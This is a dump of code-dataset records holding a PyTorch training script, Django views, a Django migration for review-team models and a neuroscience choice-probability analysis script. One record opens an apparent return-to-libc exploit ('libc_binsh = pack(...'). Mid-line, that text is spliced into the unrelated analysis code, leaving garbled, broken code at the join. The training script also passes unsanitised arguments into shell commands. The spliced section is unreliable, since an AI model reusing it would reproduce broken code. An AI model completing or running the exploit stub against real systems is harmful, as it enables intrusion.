num_workers=0, drop_last=True, collate_fn=utils.collate_feats, worker_init_fn=utils.worker_init_fn)\n\n # load network model\n model_def = utils.get_model_module(conf.model_version)\n\n # create models\n network = model_def.Network(conf)\n utils.printout(conf.flog, '\\n' + str(network) + '\\n')\n\n models = [network]\n model_names = ['network']\n\n # create optimizers\n network_opt = torch.optim.Adam(network.parameters(), lr=conf.lr, weight_decay=conf.weight_decay)\n optimizers = [network_opt]\n optimizer_names = ['network_opt']\n\n # learning rate scheduler\n network_lr_scheduler = torch.optim.lr_scheduler.StepLR(network_opt, step_size=conf.lr_decay_every, gamma=conf.lr_decay_by)\n\n # create logs\n if not conf.no_console_log:\n header = ' Time Epoch Dataset Iteration Progress(%) LR ReconLoss KLDivLoss TotalLoss'\n if not conf.no_tb_log:\n # https://github.com/lanpa/tensorboard-pytorch\n from tensorboardX import SummaryWriter\n train_writer = SummaryWriter(os.path.join(conf.exp_dir, 'train'))\n val_writer = SummaryWriter(os.path.join(conf.exp_dir, 'val'))\n\n # send parameters to device\n for m in models:\n m.to(conf.device)\n for o in optimizers:\n utils.optimizer_to_device(o, conf.device)\n\n # start training\n start_time = time.time()\n\n last_checkpoint_step = None\n last_train_console_log_step, last_val_console_log_step = None, None\n train_num_batch = len(train_dataloader)\n val_num_batch = len(val_dataloader)\n\n # train for every epoch\n for epoch in range(conf.epochs):\n if not conf.no_console_log:\n utils.printout(conf.flog, f'training run {conf.exp_name}')\n utils.printout(conf.flog, header)\n\n train_batches = enumerate(train_dataloader, 0)\n val_batches = enumerate(val_dataloader, 0)\n train_fraction_done = 0.0\n val_fraction_done = 0.0\n val_batch_ind = -1\n\n # train for every batch\n for train_batch_ind, batch in train_batches:\n train_fraction_done = (train_batch_ind + 1) / train_num_batch\n train_step = epoch * train_num_batch + train_batch_ind\n\n log_console = not conf.no_console_log and (last_train_console_log_step is None or \\\n train_step - last_train_console_log_step >= conf.console_log_interval)\n if log_console:\n 
last_train_console_log_step = train_step\n\n            # set models to training mode\n            for m in models:\n                m.train()\n\n            # forward pass (including logging)\n            total_loss = forward(batch=batch, data_features=data_features, network=network, conf=conf, is_val=False, \\\n                step=train_step, epoch=epoch, batch_ind=train_batch_ind, num_batch=train_num_batch, start_time=start_time, \\\n                log_console=log_console, log_tb=not conf.no_tb_log, tb_writer=train_writer, lr=network_opt.param_groups[0]['lr'])\n\n            # optimize one step\n            network_opt.zero_grad()\n            total_loss.backward()\n            network_opt.step()\n            network_lr_scheduler.step()\n\n            # save checkpoint\n            with torch.no_grad():\n                if last_checkpoint_step is None or train_step - last_checkpoint_step >= conf.checkpoint_interval:\n                    utils.printout(conf.flog, 'Saving checkpoint ...... ')\n                    utils.save_checkpoint(models=models, model_names=model_names, dirname=os.path.join(conf.exp_dir, 'ckpts'), \\\n                        epoch=epoch, prepend_epoch=True, optimizers=optimizers, optimizer_names=optimizer_names)\n                    utils.printout(conf.flog, 'DONE')\n                    last_checkpoint_step = train_step\n\n            # validate one batch\n            while val_fraction_done <= train_fraction_done and val_batch_ind+1 < val_num_batch:\n                val_batch_ind, val_batch = next(val_batches)\n\n                val_fraction_done = (val_batch_ind + 1) / val_num_batch\n                val_step = (epoch + val_fraction_done) * train_num_batch - 1\n\n                log_console = not conf.no_console_log and (last_val_console_log_step is None or \\\n                    val_step - last_val_console_log_step >= conf.console_log_interval)\n                if log_console:\n                    last_val_console_log_step = val_step\n\n                # set models to evaluation mode\n                for m in models:\n                    m.eval()\n\n                with torch.no_grad():\n                    # forward pass (including logging)\n                    __ = forward(batch=val_batch, data_features=data_features, network=network, conf=conf, is_val=True, \\\n                        step=val_step, epoch=epoch, batch_ind=val_batch_ind, num_batch=val_num_batch, start_time=start_time, \\\n                        log_console=log_console, log_tb=not conf.no_tb_log, tb_writer=val_writer, lr=network_opt.param_groups[0]['lr'])\n\n    # save the final models\n    utils.printout(conf.flog, 'Saving final checkpoint ...... 
')\n utils.save_checkpoint(models=models, model_names=model_names, dirname=os.path.join(conf.exp_dir, 'ckpts'), \\\n epoch=epoch, prepend_epoch=False, optimizers=optimizers, optimizer_names=optimizer_names)\n utils.printout(conf.flog, 'DONE')\n\n\ndef forward(batch, data_features, network, conf, \\\n is_val=False, step=None, epoch=None, batch_ind=0, num_batch=1, start_time=0, \\\n log_console=False, log_tb=False, tb_writer=None, lr=None):\n # prepare input\n input_pcs = torch.cat(batch[data_features.index('pc')], dim=0).to(conf.device) # B x N x 3\n batch_size = input_pcs.shape[0]\n\n # forward through the network\n output_pcs, pc_feats, ret_list = network(input_pcs) # B x N x 3, B x P\n\n # for each type of loss, compute losses per data\n recon_loss_per_data = network.get_loss(input_pcs, output_pcs)\n\n kldiv_loss_per_data = torch.zeros_like(recon_loss_per_data)\n if conf.probabilistic:\n kldiv_loss_per_data = ret_list['kldiv_loss']\n\n # for each type of loss, compute avg loss per batch\n recon_loss = recon_loss_per_data.mean()\n kldiv_loss = kldiv_loss_per_data.mean()\n\n # compute total loss\n total_loss = recon_loss + conf.kldiv_loss_weight * kldiv_loss\n\n # display information\n data_split = 'train'\n if is_val:\n data_split = 'val'\n\n with torch.no_grad():\n # log to console\n if log_console:\n utils.printout(conf.flog, \\\n f'''{strftime(\"%H:%M:%S\", time.gmtime(time.time()-start_time)):>9s} '''\n f'''{epoch:>5.0f}/{conf.epochs:<5.0f} '''\n f'''{data_split:^10s} '''\n f'''{batch_ind:>5.0f}/{num_batch:<5.0f} '''\n f'''{100. * (1+batch_ind+num_batch*epoch) / (num_batch*conf.epochs):>9.1f}% '''\n f'''{lr:>5.2E} '''\n f'''{recon_loss.item():>10.5f}'''\n f'''{kldiv_loss.item():>10.5f}'''\n f'''{total_loss.item():>10.5f}''')\n conf.flog.flush()\n\n # log to tensorboard\n if log_tb and tb_writer is not None:\n tb_writer.add_scalar('recon_loss', recon_loss.item(), step)\n tb_writer.add_scalar('kldiv_loss', kldiv_loss.item(), step)\n tb_writer.add_scalar('total_loss', total_loss.item(), step)\n tb_writer.add_scalar('lr', lr, step)\n\n # gen visu\n if is_val and (not conf.no_visu) and epoch % conf.num_epoch_every_visu == 0:\n visu_dir = os.path.join(conf.exp_dir, 'val_visu')\n out_dir = os.path.join(visu_dir, 'epoch-%04d' % epoch)\n input_pcs_dir = os.path.join(out_dir, 'input_pcs')\n output_pcs_dir = os.path.join(out_dir, 'output_pcs')\n info_dir = os.path.join(out_dir, 'info')\n\n if batch_ind == 0:\n # create folders\n os.mkdir(out_dir)\n os.mkdir(input_pcs_dir)\n os.mkdir(output_pcs_dir)\n os.mkdir(info_dir)\n\n if batch_ind < conf.num_batch_every_visu:\n utils.printout(conf.flog, 'Visualizing ...')\n\n for i in range(batch_size):\n fn = 'data-%03d.png' % (batch_ind * batch_size + i)\n\n # render_pts(os.path.join(input_pcs_dir, fn), input_pcs[i].cpu().numpy())\n # render_pts(os.path.join(output_pcs_dir, fn), output_pcs[i].cpu().numpy())\n # or to render using matplotlib\n utils.render_pc(os.path.join(input_pcs_dir, fn), input_pcs[i].cpu().numpy())\n utils.render_pc(os.path.join(output_pcs_dir, fn), output_pcs[i].cpu().numpy())\n\n with open(os.path.join(info_dir, fn.replace('.png', '.txt')), 'w') as fout:\n fout.write('shape_id: %s\\n' % batch[data_features.index('shape_id')][i])\n fout.write('recon_loss: %f\\n' % recon_loss_per_data[i].item())\n fout.write('kldiv_loss: %f\\n' % kldiv_loss_per_data[i].item())\n\n if batch_ind == conf.num_batch_every_visu - 1:\n # visu html\n utils.printout(conf.flog, 'Generating html visualization ...')\n sublist = 'input_pcs,output_pcs,info'\n cmd = 
'cd %s && python %s . 10 htmls %s %s > /dev/null' % (out_dir, os.path.join(BASE_DIR, '../utils/gen_html_hierarchy_local.py'), sublist, sublist)\n call(cmd, shell=True)\n utils.printout(conf.flog, 'DONE')\n\n return total_loss\n\n\nif __name__ == '__main__':\n\n ### get parameters\n parser = ArgumentParser()\n\n # main parameters (required)\n parser.add_argument('--exp_suffix', type=str, help='exp suffix')\n parser.add_argument('--model_version', type=str, help='model def file')\n\n # main parameters (optional)\n parser.add_argument('--device', type=str, default='cuda:0', help='cpu or cuda:x for using cuda on GPU number x')\n parser.add_argument('--seed', type=int, default=3124256514, help='random seed (for reproducibility) [specify -1 means to generate a random one]')\n #parser.add_argument('--seed', type=int, default=-1, help='random seed (for reproducibility) [specify -1 means to generate a random one]')\n parser.add_argument('--log_dir', type=str, default='logs', help='exp logs directory')\n parser.add_argument('--data_dir', type=str, help='data directory')\n parser.add_argument('--val_data_dir', type=str, help='data directory')\n parser.add_argument('--overwrite', action='store_true', default=False, help='overwrite if exp_dir exists [default: False]')\n\n # network settings\n parser.add_argument('--num_point', type=int, default=2048)\n parser.add_argument('--decoder_type', type=str, default='fc')\n parser.add_argument('--loss_type', type=str, default='cd')\n parser.add_argument('--kldiv_loss_weight', type=float, default=1e-4)\n parser.add_argument('--probabilistic', action='store_true', default=False, help='probabilistic [default: False]')\n\n # training parameters\n parser.add_argument('--epochs', type=int, default=1000)\n parser.add_argument('--batch_size', type=int, default=16)\n parser.add_argument('--num_workers', type=int, default=5)\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--weight_decay', type=float, default=1e-5)\n parser.add_argument('--lr_decay_by', type=float, default=0.9)\n parser.add_argument('--lr_decay_every', type=float, default=5000)\n\n # loss weights\n\n # logging\n parser.add_argument('--no_tb_log', action='store_true', default=False)\n parser.add_argument('--no_console_log', action='store_true', default=False)\n parser.add_argument('--console_log_interval', type=int, default=10, help='number of optimization steps beween console log prints')\n parser.add_argument('--checkpoint_interval', type=int, default=10000, help='number of optimization steps beween checkpoints')\n\n # visu\n parser.add_argument('--num_batch_every_visu', type=int, default=1, help='num batch every visu')\n parser.add_argument('--num_epoch_every_visu', type=int, default=10, help='num epoch every visu')\n parser.add_argument('--no_visu', action='store_true', default=False, help='no visu? [default: False]')\n\n # parse args\n conf = parser.parse_args()\n\n\n ### prepare before training\n # make exp_name\n conf.exp_name = f'exp-{conf.model_version}-{conf.exp_suffix}'\n\n # mkdir exp_dir; ask for overwrite if necessary\n conf.exp_dir = os.path.join(conf.log_dir, conf.exp_name)\n if os.path.exists(conf.exp_dir):\n if not conf.overwrite:\n response = input('A training run named \"%s\" already exists, overwrite? 
(y/n) ' % conf.exp_name)\n if response != 'y':\n exit(1)\n shutil.rmtree(conf.exp_dir)\n os.mkdir(conf.exp_dir)\n os.mkdir(os.path.join(conf.exp_dir, 'ckpts'))\n if not conf.no_visu:\n os.mkdir(os.path.join(conf.exp_dir, 'val_visu'))\n\n # control randomness\n if conf.seed < 0:\n conf.seed = random.randint(1, 10000)\n random.seed(conf.seed)\n np.random.seed(conf.seed)\n torch.manual_seed(conf.seed)\n\n # save config\n torch.save(conf, os.path.join(conf.exp_dir, 'conf.pth'))\n\n # file log\n flog = open(os.path.join(conf.exp_dir, 'train_log.txt'), 'w')\n conf.flog = flog\n\n # backup command running\n utils.printout(flog, ' '.join(sys.argv) + '\\n')\n utils.printout(flog, f'Random Seed: {conf.seed}')\n\n # backup python files used for this training\n os.system('cp data.py models/%s.py %s %s' % (conf.model_version, __file__, conf.exp_dir))\n\n # set training device\n device = torch.device(conf.device)\n utils.printout(flog, f'Using device: {conf.device}\\n')\n conf.device = device\n\n ### start training\n train(conf)\n\n\n ### before quit\n # close file log\n flog.close()\n\n","sub_path":"exps/exp_baseline1/train_v1.py","file_name":"train_v1.py","file_ext":"py","file_size_in_byte":15280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"43277799","text":"from django.shortcuts import render,HttpResponse\nfrom layui import models\nfrom django.core import serializers\n\n# Create your views here.\ndef test(request):\n if request.method==\"GET\":\n print(\"用户已经创建\")\n # for i in range(0,100):\n # obj=models.Cuetomer.objects.create(name='我是%s号'%i,age=i)\n return render(request, 'test1.html')\n if request.method==\"POST\":\n print(request.POST.get(\"time\"),'time')\n\n return render(request, 'test1.html')\n\nimport json\n\ndef getinfo(request):\n if request.method==\"GET\":\n print(\"get_info geT\")\n return HttpResponse(\"GET\")\n if request.method==\"POST\":\n print('page',request.POST.get(\"start\"))\n page=request.POST.get(\"start\")\n\n print(\"来取数据了\")\n data=models.Cuetomer.objects.filter(id=page).values('name')[0]['name']\n print(data)\n ret = {'status': False, 'mydata': ''}\n ret['mydata'] = data\n # return render(request,'test1.html',{mydata:'123'})\n return HttpResponse(json.dumps(ret))\n\n\n\n\n\n","sub_path":"mylayui/layui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"364144198","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('name', '0015_insert_review_name_data'),\n ('group', '0008_auto_20160505_0523'),\n ('person', '0014_auto_20160613_0751'),\n ('doc', '0012_auto_20160207_0537'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='NextReviewerInTeam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('next_reviewer', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name': 'next reviewer in team setting',\n 'verbose_name_plural': 'next reviewer in team settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ResultUsedInReviewTeam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('result', models.ForeignKey(to='name.ReviewResultName')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name': 'review result used in team setting',\n 'verbose_name_plural': 'review result used in team settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReviewerSettings',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('min_interval', models.IntegerField(default=30, verbose_name=b'Can review at most', choices=[(7, b'Once per week'), (14, b'Once per fortnight'), (30, b'Once per month'), (61, b'Once per two months'), (91, b'Once per quarter')])),\n ('filter_re', models.CharField(help_text=b'Draft names matching regular expression should not be assigned', max_length=255, verbose_name=b'Filter regexp', blank=True)),\n ('skip_next', models.IntegerField(default=0, verbose_name=b'Skip next assignments')),\n ('remind_days_before_deadline', models.IntegerField(help_text=b\"To get an email reminder in case you forget to do an assigned review, enter the number of days before a review deadline you want to receive it. Clear the field if you don't want a reminder.\", null=True, blank=True)),\n ('person', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name_plural': 'reviewer settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReviewRequest',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('old_id', models.IntegerField(help_text=b'ID in previous review system', null=True, blank=True)),\n ('time', models.DateTimeField(default=datetime.datetime.now)),\n ('deadline', models.DateField()),\n ('requested_rev', models.CharField(help_text=b'Fill in if a specific revision is to be reviewed, e.g. 
02', max_length=16, verbose_name=b'requested revision', blank=True)),\n ('reviewed_rev', models.CharField(max_length=16, verbose_name=b'reviewed revision', blank=True)),\n ('doc', models.ForeignKey(related_name='reviewrequest_set', to='doc.Document')),\n ('requested_by', models.ForeignKey(to='person.Person')),\n ('result', models.ForeignKey(blank=True, to='name.ReviewResultName', null=True)),\n ('review', models.OneToOneField(null=True, blank=True, to='doc.Document')),\n ('reviewer', models.ForeignKey(blank=True, to='person.Email', null=True)),\n ('state', models.ForeignKey(to='name.ReviewRequestStateName')),\n ('team', models.ForeignKey(to='group.Group')),\n ('type', models.ForeignKey(to='name.ReviewTypeName')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReviewWish',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField(default=datetime.datetime.now)),\n ('doc', models.ForeignKey(to='doc.Document')),\n ('person', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name_plural': 'review wishes',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TypeUsedInReviewTeam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('team', models.ForeignKey(to='group.Group')),\n ('type', models.ForeignKey(to='name.ReviewTypeName')),\n ],\n options={\n 'verbose_name': 'review type used in team setting',\n 'verbose_name_plural': 'review type used in team settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UnavailablePeriod',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('start_date', models.DateField(default=datetime.date.today, help_text=b\"Choose the start date so that you can still do a review if it's assigned just before the start date - this usually means you should mark yourself unavailable for assignment some time before you are actually away.\")),\n ('end_date', models.DateField(help_text=b'Leaving the end date blank means that the period continues indefinitely. You can end it later.', null=True, blank=True)),\n ('availability', models.CharField(max_length=30, choices=[(b'canfinish', b'Can do follow-ups'), (b'unavailable', b'Completely unavailable')])),\n ('person', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"ietf/review/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"216315239","text":"#!/usr/bin/python\nfrom struct import *\nimport os\n\n\nlibc_binsh = pack(\"= int(nSE * sub)], size=nselect)\n filteredactn = np.vstack((filteredactn1, filteredactn2))\n\n return filteredactn\n\n\ndef get_CPs(rates, pref_msk, actn, dt, smoothwin=100e-3, step=5):\n \"\"\"\n pref_msk is tailored to this population rates and it's a bool!\n get choice probability obtaining the distribution of each timepoint\n for active neurons of a population\n\n :param: rates: ntrls, nSE, timepoints\n :param: pref_msk:\n :param: actn:\n :param: dt:\n :param: smoothwin:\n :param: step:\n :return: aucs # CPs\n \"\"\"\n # params\n timepoints = rates.shape[2]\n this_time = np.linspace(0, timepoints, int(timepoints / step), dtype=int)[:-1]\n nselect = actn.shape[0]\n newdt = dt * step\n kernel = np.ones((int(smoothwin / newdt)))\n prefrates = rates[pref_msk == True, :, :]\n nprefrates = rates[pref_msk == False, :, :]\n\n # allocate variable to save CP\n aucs = np.zeros((nselect, this_time.shape[0]))\n smoothauc = aucs.copy()\n\n # for each neuron that is active\n for i, n in tqdm(enumerate(actn)):\n\n # define max rate of neuron\n maxrate = max(2, rates[:, n, :].max() + 1)\n\n # for each timepoint\n for j, t in enumerate(this_time):\n # get this rate across all trials\n pref = prefrates[:, n, t:t + step]\n npref = nprefrates[:, n, t:t + step]\n\n # hist\n x1, e1 = np.histogram(pref, bins=np.arange(maxrate), density=True)\n x2, e2 = np.histogram(npref, bins=np.arange(maxrate), density=True)\n\n # cumulative distribution\n cx1 = np.concatenate(([0], np.cumsum(x1)))\n cx2 = np.concatenate(([0], np.cumsum(x2)))\n\n # auc\n aucs[i, j] = mtr.auc(cx1, cx2) # reversed because pref > npref\n\n smoothauc[i] = np.convolve(aucs[i], kernel, mode='same') / (smoothwin/newdt)\n\n return smoothauc\n\n\ndef get_corr(rates, actn, dt, smoothwin=250e-3, step=10):\n \"\"\"\n Pearson correlations at each time point between two neurons\n bins are size step.\n\n :param: rates:\n :param: actn:\n :param: dt:\n :param: smoothwin:\n :param: step:\n :return: corrall, corrii, corrij\n \"\"\"\n # params\n timepoints = rates.shape[2]\n this_time = np.linspace(0, timepoints, int(timepoints / step), dtype=int)[:-1]\n actn1 = actn[0]\n actn2 = actn[1]\n nselect = actn.shape[1]\n\n # allocate variables\n corrs = np.zeros((nselect ** 2 * 2, this_time.shape[0]))\n corrs1 = np.zeros((nselect ** 2, this_time.shape[0]))\n corrs2 = corrs1.copy()\n\n # massive for loop through both subpopulations\n for i1, n1 in tqdm(enumerate(actn1)):\n for i2, n2 in enumerate(actn2):\n for j, t in enumerate(this_time):\n\n # get rates for each case\n x11 = rates[:, n1, t:t + step].mean(axis=1)\n x12 = rates[:, actn1[i2], t:t + step].mean(axis=1)\n\n x21 = rates[:, actn2[i1], t:t + step].mean(axis=1)\n x22 = rates[:, n2, t:t + step].mean(axis=1)\n\n x1 = rates[:, n1, t:t + step].mean(axis=1)\n x2 = rates[:, n2, t:t + step].mean(axis=1)\n\n # check if we have info aside from zero\n if not (np.nonzero(x11)[0].size == False) or not (np.nonzero(x12)[0].size == False):\n # correlations between pop1\n corrs1[int(nselect * i1) + i2, j] = np.corrcoef(x11, x12)[0, 1]\n\n if not (np.nonzero(x21)[0].size == False) or not (np.nonzero(x22)[0].size == False):\n # correlations between pop2\n corrs2[int(nselect * i2) + i1, j] = np.corrcoef(x21, x22)[0, 1]\n\n if not (np.nonzero(x1)[0].size == False) or not (np.nonzero(x2)[0].size == False):\n # correlations across pops)\n k = np.corrcoef(x1, x2)\n corrs[int(nselect * i1) + i2, j] = k[0, 1]\n 
corrs[-int(nselect * i1) + i2, j] = k[1, 0]\n\n # return as corrsall, corrsii, corrsij\n corrsall = np.concatenate((corrs, corrs1, corrs2), axis=0)\n corrsii = np.concatenate((corrs1, corrs2), axis=0)\n\n # allocate variables for smoothing\n newdt = dt * step\n kernel = np.ones((int(smoothwin / newdt)))\n smoothcorrsall = np.zeros(corrsall.shape)\n smoothcorrsii = np.zeros(corrsii.shape)\n smoothcorrsij = np.zeros(corrs.shape)\n\n for n in np.arange(corrsall.shape[0]):\n smoothcorrsall[n] = np.convolve(corrsall[n], kernel, mode='same') / (smoothwin/newdt)\n\n if n < corrs.shape[0]:\n smoothcorrsii[n] = np.convolve(corrsii[n], kernel, mode='same') / (smoothwin/newdt)\n smoothcorrsij[n] = np.convolve(corrs[n], kernel, mode='same') / (smoothwin/newdt)\n\n return smoothcorrsall, smoothcorrsii, smoothcorrsij\n\n\n# decorator for experiment\nthisexperiment = '2018-12-11-09h04m25s'\n\n\n@experiment_opener({'test0': thisexperiment}, load_path, show=plt_show)\ndef plot_fig2(tables_task_ids):\n \"\"\"\n Using the experiment_opener decorator automates some of the tedious aspects of handling experiment\n files, including opening and closing the file, plus it also calls plt.show() if you ask it to.\n And finally, it fixes a problem with SVG files so that they don't explode Inkscape if you import them.\n\n :param tables_task_ids: dict mapping from user supplied name to a tuple of (tables, task_ids)\n :return:\n \"\"\"\n from snep.tables.experiment import ExperimentTables\n\n tables, task_ids = tables_task_ids['test0']\n assert isinstance(tables, ExperimentTables) # This allows PyCharm to autocomplete method names for tables\n params = tables.get_general_params(True)\n param_ranges = tables.read_param_ranges()\n\n # filter tasks to only the ones that reach the targets\n targets = [{('c',): 0, ('bfb',): 0}]\n target_ids = filter_tasks(task_ids, targets)\n\n # -------------------------------------\n # Get experiment results and params\n # -------------------------------------\n # Simulation times\n ntrls = len(target_ids)\n sub = params['sen']['populations']['sub']\n settletime = params['simulation']['settletime'] / second\n runtime = params['simulation']['runtime'] / second - settletime\n stimon = params['simulation']['stimon'] / second - settletime\n stimoff = params['simulation']['stimoff'] / second - settletime\n pops, timepoints = tables.get_raw_data(task_ids[0])['poprates_dec'].shape\n dt = runtime / timepoints\n nSE, downsampltimepoints = tables.get_computed(task_ids[0])['spikes'].shape\n time = np.linspace(0, runtime, timepoints)\n downsampltime = np.linspace(0, runtime, downsampltimepoints)\n downsampldt = runtime / downsampltimepoints\n\n # allocate variables\n rateDE = np.empty((ntrls, pops, timepoints), dtype='float32')\n rateSE = np.empty((ntrls, pops, timepoints), dtype='float32')\n spksSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n # evntSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n # brstSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n # snglSE = np.empty((ntrls, nSE, downsampltimepoints), dtype='float32')\n pref_msk = np.empty((ntrls, 1), dtype='int')\n\n # loop through trials and retrieve results\n for trl, tid in tqdm(enumerate(target_ids)):\n # get neurometric info of all neurons\n computed = tables.get_computed(tid)\n spksSE[trl] = computed['spikes']\n # evntSE[trl] = computed['events']\n # brstSE[trl] = computed['bursts']\n # snglSE[trl] = computed['singles']\n\n # population rates\n raw_data = tables.get_raw_data(tid)\n 
rateDE[trl] = raw_data['poprates_dec']  # 0: pref, 1: npref\n        rateSE[trl] = raw_data['poprates_sen']  # 0: pref, 1: npref\n        pref_msk[trl] = raw_data['pref_msk']\n\n    # -------------------------------------\n    # Choice probability and correlations\n    # -------------------------------------\n    # accuracy\n    acc = pref_msk.sum() / ntrls\n\n    # get active neurons, 100 per subpopulation\n    actn = get_actn(spksSE, sub)\n\n    # a calculation every 1, 5 or 10 ms?\n    stepCP = 10\n    auc1 = get_CPs(spksSE, np.logical_not(pref_msk), actn[0], downsampldt, step=stepCP)\n    auc2 = get_CPs(spksSE, pref_msk.astype(bool), actn[1], downsampldt, step=stepCP)\n    auc12 = np.concatenate((auc1, auc2), axis=0)\n\n    stepCorr = 50\n    corrsall, corrsii, corrsij = get_corr(spksSE, actn, downsampldt, step=stepCorr)\n\n    # -------------------------------------\n    # Plot figure 2\n    # -------------------------------------\n    fig, axs = plt.subplots(4, 1, figsize=(8, 12), sharex=True)\n\n    fig.add_axes(axs[0])\n    plt.plot(time, rateDE[:, 0, :].mean(axis=0), c='C3', lw=2, label='preferred')\n    plt.plot(time, rateDE[:, 1, :].mean(axis=0), c='C0', lw=2, label='non-preferred')\n    plt.axvline(x=stimon, color='gray', ls='dashed', lw=1.5)\n    plt.axvline(x=stimoff, color='gray', ls='dashed', lw=1.5)\n    plt.title('Integration circuit')\n    plt.ylabel('Population rate (sp/s)')  # , {'horizontalalignment': 'right'}\n    plt.ylim(0, 50)\n    # plt.legend(loc='center right', bbox_to_anchor=(1.22, 0.82))\n\n    # sensory circuit\n    fig.add_axes(axs[1])\n    plt.plot(time, rateSE[:, 0, :].mean(axis=0), c='C3', lw=2, label='preferred')\n    plt.plot(time, rateSE[:, 1, :].mean(axis=0), c='C0', lw=2, label='non-preferred')\n    plt.axvline(x=stimon, color='gray', ls='dashed', lw=2)\n    plt.axvline(x=stimoff, color='gray', ls='dashed', lw=2)\n    plt.title('Sensory circuit')\n    plt.ylabel('Population rate (sp/s)')\n    plt.ylim(0, 20)  # 0, 15\n    plt.legend(loc='center', bbox_to_anchor=(0.76, 0.91), ncol=2, fontsize='x-small')\n\n    # CPs\n    # clean to plot\n    aucm = auc12.mean(axis=0)\n    ymin = 0.45\n    cleanaucm = np.ones(aucm.shape) * np.nan\n    cleanaucm[aucm > ymin] = aucm[aucm > ymin]\n\n    fig.add_axes(axs[2])\n    plt.plot(downsampltime[::stepCP][1:], cleanaucm, 'k', lw=2)\n    plt.axvline(x=stimon, color='gray', ls='dashed', lw=2)\n    plt.axvline(x=stimoff, color='gray', ls='dashed', lw=2)\n    plt.ylabel('Choice prob.')\n    plt.ylim(ymin, ymin + 0.2)  # ymin+0.2\n\n    # correlations\n    fig.add_axes(axs[3])\n    plt.plot(downsampltime[::stepCorr][1:], np.nanmean(corrsall, axis=0), c='k', lw=2, label='EE')\n    plt.plot(downsampltime[::stepCorr][1:], np.nanmean(corrsii, axis=0), c='C4', lw=2, label='EiEi')\n    plt.plot(downsampltime[::stepCorr][1:], np.nanmean(corrsij, axis=0), c='C2', lw=2, label='EiEj')\n    plt.axvline(x=stimon, color='gray', ls='dashed', lw=2)\n    plt.axvline(x=stimoff, color='gray', ls='dashed', lw=2)\n    plt.xlim(stimon - 0.5, stimoff + 0.5)\n    plt.ylim(-0.2, 0.2)  # -0.25, 0.25\n    plt.xlabel('Time (s)')\n    plt.ylabel('Noise correlations')\n    plt.legend(loc='center', bbox_to_anchor=(0.77, 0.95), ncol=3, fontsize='x-small')\n\n    # save figure\n    #savepath = '/Users/PSR/Documents/WS19/MasterThesis/Experiments/run_hierarchical/'\n    fig.savefig(load_path + '/' + thisexperiment + '/figure2.png')\n    plt.close(fig)\n\n    # -------------------------------------\n    # Save analysis\n    # -------------------------------------\n    thisanalysisname = '/CPs-' + str(ntrls) + 'trls-' + str(targets) + '.pkl'\n\n    # save variables\n    with open(load_path + '/' + thisexperiment + thisanalysisname, 'wb') as f:\n        pickle.dump([pref_msk,\n                     actn,\n                     auc12,\n                     
[corrsall, corrsii, corrsij]], f)\n\n # TODO: plot burst probability and coherence levels\n # TODO: plot accuracy!\n\nif __name__ == '__main__':\n plot_fig2()\n # explore_data()\n","sub_path":"choiceProb.py","file_name":"choiceProb.py","file_ext":"py","file_size_in_byte":12568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
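The inner loop of get_CPs above turns each neuron/timepoint pair into a choice probability: histogram the rates of preferred and non-preferred trials, take cumulative distributions, and integrate one against the other. A minimal self-contained version of just that computation (names are illustrative; np.trapz stands in for sklearn.metrics.auc, which the file aliases as mtr):

import numpy as np

def choice_probability(pref, npref):
    # AUC of the ROC-style curve built from cumulative rate histograms
    maxrate = max(2, int(max(pref.max(), npref.max())) + 1)
    x1, _ = np.histogram(pref, bins=np.arange(maxrate), density=True)
    x2, _ = np.histogram(npref, bins=np.arange(maxrate), density=True)
    cx1 = np.concatenate(([0], np.cumsum(x1)))
    cx2 = np.concatenate(([0], np.cumsum(x2)))
    return np.trapz(cx2, cx1)  # arguments reversed because pref > npref, as in the file

rng = np.random.default_rng(0)
cp = choice_probability(rng.poisson(6.0, 200), rng.poisson(4.0, 200))
print(round(cp, 3))  # > 0.5 when preferred rates tend to be higher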
